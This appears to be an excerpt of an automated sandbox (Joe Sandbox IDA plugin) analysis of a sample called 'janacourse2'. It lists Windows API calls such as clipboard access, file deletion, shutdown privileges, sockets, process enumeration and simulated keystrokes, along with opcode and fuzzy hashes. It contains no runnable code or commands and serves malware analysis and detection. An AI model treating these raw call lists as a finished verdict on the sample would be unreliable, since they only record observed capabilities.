• GlobalUnlock.KERNEL32(00000000), ref: 0102EC22
• IsClipboardFormatAvailable.USER32(0000000F), ref: 0102EC38
• GetClipboardData.USER32(0000000F), ref: 0102EC44
• GlobalLock.KERNEL32(00000000), ref: 0102EC55
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0102EC77
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0102EC94
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0102ECD2
• GlobalUnlock.KERNEL32(00000000), ref: 0102ECF3
• CountClipboardFormats.USER32 ref: 0102ED14
• CloseClipboard.USER32 ref: 0102ED59
Similarity
• API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
• String ID:
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 010269BE
• FindClose.KERNEL32(00000000), ref: 01026A12
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01026A4E
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01026A75
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
• FileTimeToSystemTime.KERNEL32(?,?), ref: 01026AB2
• FileTimeToSystemTime.KERNEL32(?,?), ref: 01026ADF
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 01029663
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 010296A1
                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 010296BB
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 010296D3
                                                                                                            • FindClose.KERNEL32(00000000), ref: 010296DE
                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 010296FA
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0102974A
                                                                                                            • SetCurrentDirectoryW.KERNEL32(01076B7C), ref: 01029768
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 01029772
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0102977F
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0102978F
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 1409584000-438819550
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 010297BE
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 01029819
                                                                                                            • FindClose.KERNEL32(00000000), ref: 01029824
                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 01029840
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01029890
                                                                                                            • SetCurrentDirectoryW.KERNEL32(01076B7C), ref: 010298AE
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 010298B8
                                                                                                            • FindClose.KERNEL32(00000000), ref: 010298C5
                                                                                                            • FindClose.KERNEL32(00000000), ref: 010298D5
                                                                                                              • Part of subcall function 0101DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0101DB00
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 2640511053-438819550
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 01028257
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 01028267
                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01028273
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01028310
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028324
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028356
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0102838C
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028395
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 1464919966-438819550
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB3A97,?,?,00FB2E7F,?,?,?,00000000), ref: 00FB3AC2
                                                                                                              • Part of subcall function 0101E199: GetFileAttributesW.KERNEL32(?,0101CF95), ref: 0101E19A
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0101D122
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0101D1DD
                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0101D1F0
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0101D20D
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0101D237
                                                                                                              • Part of subcall function 0101D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0101D21C,?,?), ref: 0101D2B2
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0101D253
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0101D264
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                            APIs
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1737998785-0
                                                                                                            APIs
                                                                                                              • Part of subcall function 010116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101170D
                                                                                                              • Part of subcall function 010116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0101173A
                                                                                                              • Part of subcall function 010116C3: GetLastError.KERNEL32 ref: 0101174A
                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0101E932
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                            APIs
                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 01031276
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031283
                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 010312BA
                                                                                                            • WSAGetLastError.WSOCK32 ref: 010312C5
                                                                                                            • closesocket.WSOCK32(00000000), ref: 010312F4
                                                                                                            • listen.WSOCK32(00000000,00000005), ref: 01031303
                                                                                                            • WSAGetLastError.WSOCK32 ref: 0103130D
                                                                                                            • closesocket.WSOCK32(00000000), ref: 0103133C
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 540024437-0
                                                                                                            • Opcode ID: 27eb58b121116f5bcf0cdb7cdc06c5a6a1bf6644f6b5e0a9ac528cdaba4efdb0
                                                                                                            • Instruction ID: 57681a1459f29723688fd94c92e32a3af677d52dc03ece6867e1f1d76badd4a0
                                                                                                            • Opcode Fuzzy Hash: 27eb58b121116f5bcf0cdb7cdc06c5a6a1bf6644f6b5e0a9ac528cdaba4efdb0
                                                                                                            • Instruction Fuzzy Hash: B94174756001009FE720DF68C584B69BBE9AF8A314F1881D8D9969F296C775EC81CBE1
APIs
  • Part of subcall function 00FB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB3A97,?,?,00FB2E7F,?,?,?,00000000), ref: 00FB3AC2
  • Part of subcall function 0101E199: GetFileAttributesW.KERNEL32(?,0101CF95), ref: 0101E19A
• FindFirstFileW.KERNEL32(?,?), ref: 0101D420
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0101D470
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0101D481
• FindClose.KERNEL32(00000000), ref: 0101D498
• FindClose.KERNEL32(00000000), ref: 0101D4A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: 197dddd29e7a60e36e5f0430b5ed17c4875173953ea73d5e36a712df7620f7d4
• Instruction ID: 14245ac66da7f797f750bd2509420cd7a553ce117dd0b7a06f7514006e16265b
• Opcode Fuzzy Hash: 197dddd29e7a60e36e5f0430b5ed17c4875173953ea73d5e36a712df7620f7d4
• Instruction Fuzzy Hash: D631CE71048341ABC301EFA5CD958EFB7E8BE91200F844A1DF4D583191EF28EA09DB63
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: fb2fba032dcd31ed223f15a0b151ce5829953f7eb94ff37bcfede494ad11d160
• Instruction ID: 0c572fc91ca07f5a8f9a6e7029b674f6ba382b50af06c05b4823156c002fa39e
• Opcode Fuzzy Hash: fb2fba032dcd31ed223f15a0b151ce5829953f7eb94ff37bcfede494ad11d160
• Instruction Fuzzy Hash: 86C26D72E046688FDB25CF29DD407EAB7B5EB88314F1441EAD44DE7240E778AE859F40
APIs
• _wcslen.LIBCMT ref: 010264DC
• CoInitialize.OLE32(00000000), ref: 01026639
• CoCreateInstance.OLE32(0104FCF8,00000000,00000001,0104FB68,?), ref: 01026650
• CoUninitialize.OLE32 ref: 010268D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 2f2386f607ede22d918b2559b83e9e03c18cb429e00c8fed8e03d8ec69d63cd3
• Instruction ID: 2bad5379ee06c184e10ff9ef8fd3686820bfe3d40367ede82c37e577ecd184ad
• Opcode Fuzzy Hash: 2f2386f607ede22d918b2559b83e9e03c18cb429e00c8fed8e03d8ec69d63cd3
• Instruction Fuzzy Hash: 15D16A71508311AFD314EF25C881EABBBE8FF98304F10496DF5958B291EB75E905CBA2
APIs
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 01029B78
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 01029C8B
  • Part of subcall function 01023874: GetInputState.USER32 ref: 010238CB
  • Part of subcall function 01023874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01023966
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 01029BA8
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 01029C75
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: 217cdf113ff61ad54d28ecdb207320200e6aa2276af1acf1bf375ec7f1a917ab
• Instruction ID: 2e0369adc3cd862838fcfbba907f2a928e8eba06d2ecb68b97ce7eefe433a004
• Opcode Fuzzy Hash: 217cdf113ff61ad54d28ecdb207320200e6aa2276af1acf1bf375ec7f1a917ab
• Instruction Fuzzy Hash: A241D27190022EAFEF51DF64C985AEE7BF8FF05304F24409AE945A3191EB309A84CF60
APIs
  • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00FC9A4E
• GetSysColor.USER32(0000000F), ref: 00FC9B23
• SetBkColor.GDI32(?,00000000), ref: 00FC9B36
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Color$LongProcWindow
• String ID:
• API String ID: 3131106179-0
• Opcode ID: 9e855eff11f10b20e127b6ecfc0c963a333850f41ddba7926ea039accc6403f5
• Instruction ID: 0cfb2d5f68cc08db747fd0a5292e42f8b513c8d5c661b6a3bff64fba80273d71
• Opcode Fuzzy Hash: 9e855eff11f10b20e127b6ecfc0c963a333850f41ddba7926ea039accc6403f5
• Instruction Fuzzy Hash: 4CA107B150C046BEF7299A2C8E8EFBF399DEB46350F14015DF1C2965C5CAAD9D01E271
APIs
  • Part of subcall function 0103304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0103307A
  • Part of subcall function 0103304E: _wcslen.LIBCMT ref: 0103309B
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0103185D
• WSAGetLastError.WSOCK32 ref: 01031884
• bind.WSOCK32(00000000,?,00000010), ref: 010318DB
• WSAGetLastError.WSOCK32 ref: 010318E6
• closesocket.WSOCK32(00000000), ref: 01031915
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 35c5c0fb6b9b2b90555d0a2b5382b6d52aa15aea56f89d1f22e7a7a42f251ca8
• Instruction ID: f054d06d3f756f28639abf46a1af8cda090f1646102056bd7710bc1b5656295b
• Opcode Fuzzy Hash: 35c5c0fb6b9b2b90555d0a2b5382b6d52aa15aea56f89d1f22e7a7a42f251ca8
• Instruction Fuzzy Hash: 46519875A002109FE710EF24C986F6A77E59B88718F08849CF9455F3C7C779AD418BE1
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0102C21E,00000000), ref: 0102CF38
• InternetReadFile.WININET(?,00000000,?,?), ref: 0102CF6F
• GetLastError.KERNEL32(?,00000000,?,?,?,0102C21E,00000000), ref: 0102CFB4
• SetEvent.KERNEL32(?,?,00000000,?,?,?,0102C21E,00000000), ref: 0102CFC8
• SetEvent.KERNEL32(?,?,00000000,?,?,?,0102C21E,00000000), ref: 0102CFF2
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: 3a9a5717d0b4e7e41a22716ec17c3baad946b4bb9a4dc6b87643e587d328428b
• Instruction ID: 528852196e3a52e0fe373598d6067e7251f1d6426e0185d71739df9c492270ec
• Opcode Fuzzy Hash: 3a9a5717d0b4e7e41a22716ec17c3baad946b4bb9a4dc6b87643e587d328428b
• Instruction Fuzzy Hash: 43318EB1500615EFFBA0DFA9CA84EAFBBF8EF04350B10446EF596D2141DB34AA45DB60
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                            • String ID:
                                                                                                            • API String ID: 292994002-0
                                                                                                            • Opcode ID: 18b75485c7a56137b7b90ed25d2c72ab5927d67e7a5db5f12b6348ef3fb4b3ae
                                                                                                            • Instruction ID: 0c7f8554864299479850b9bf938ef867280de0b4adb41c56585d8f515e09e4a0
                                                                                                            • Opcode Fuzzy Hash: 18b75485c7a56137b7b90ed25d2c72ab5927d67e7a5db5f12b6348ef3fb4b3ae
                                                                                                            • Instruction Fuzzy Hash: E321D6B17012055FE7209F1AD9C4B6A7BE5EF89315F1880B8E8C98B341C776F882CB94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                            • API String ID: 0-1546025612
                                                                                                            • Opcode ID: d270e174050309dc2360b6d72472cfd92d785ffcbe21d7b453c724c2363f4cbe
                                                                                                            • Instruction ID: 299b0f01062941b78e92fea72956a549a9f060c9ec9ff328a09c7ac26a27de93
                                                                                                            • Opcode Fuzzy Hash: d270e174050309dc2360b6d72472cfd92d785ffcbe21d7b453c724c2363f4cbe
                                                                                                            • Instruction Fuzzy Hash: A8A27B71E0021ACBDF24CF59C8407FDB7B5AF94764F2481AADA15A7294DB309D82EF90
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0103A6AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0103A6BA
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0103A79C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0103A7AB
                                                                                                              • Part of subcall function 00FCCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00FF3303,?), ref: 00FCCE8A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1991900642-0
                                                                                                            • Opcode ID: c1f9f8796a6c9f46f2651c1b33b2c1375d93ed3b9c3f19eef4fb928b5990a1b9
                                                                                                            • Instruction ID: 9591fdd5f8f13ee471d2af6c822303403547c6e0d7c174fd7e7d6bf6b83ab9ef
                                                                                                            • Opcode Fuzzy Hash: c1f9f8796a6c9f46f2651c1b33b2c1375d93ed3b9c3f19eef4fb928b5990a1b9
                                                                                                            • Instruction Fuzzy Hash: 2F5169B1508301AFD710EF25CD86AABBBE8FF89714F00891DF58597251EB39D904DB92
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0101ABF1
                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0101AC0D
                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0101AC74
                                                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0101ACC6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 432972143-0
                                                                                                            • Opcode ID: 2f30d33ffb5f2dcd955031d2cf66efbbd1f3fdb4063a9e962ac19c98474737ea
                                                                                                            • Instruction ID: 1287e0e7cdc60f8d93d43670a2d9a3fb39d2edfab8ab083887bcf755f3a50fc7
                                                                                                            • Opcode Fuzzy Hash: 2f30d33ffb5f2dcd955031d2cf66efbbd1f3fdb4063a9e962ac19c98474737ea
                                                                                                            • Instruction Fuzzy Hash: 1D311470B0129CEFFF358A6988147FE7AE5AB89320F04425AE4C5932D9D37D85858791
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00FEBB7F
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • GetTimeZoneInformation.KERNEL32 ref: 00FEBB91
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,0108121C,000000FF,?,0000003F,?,?), ref: 00FEBC09
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,01081270,000000FF,?,0000003F,?,?,?,0108121C,000000FF,?,0000003F,?,?), ref: 00FEBC36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
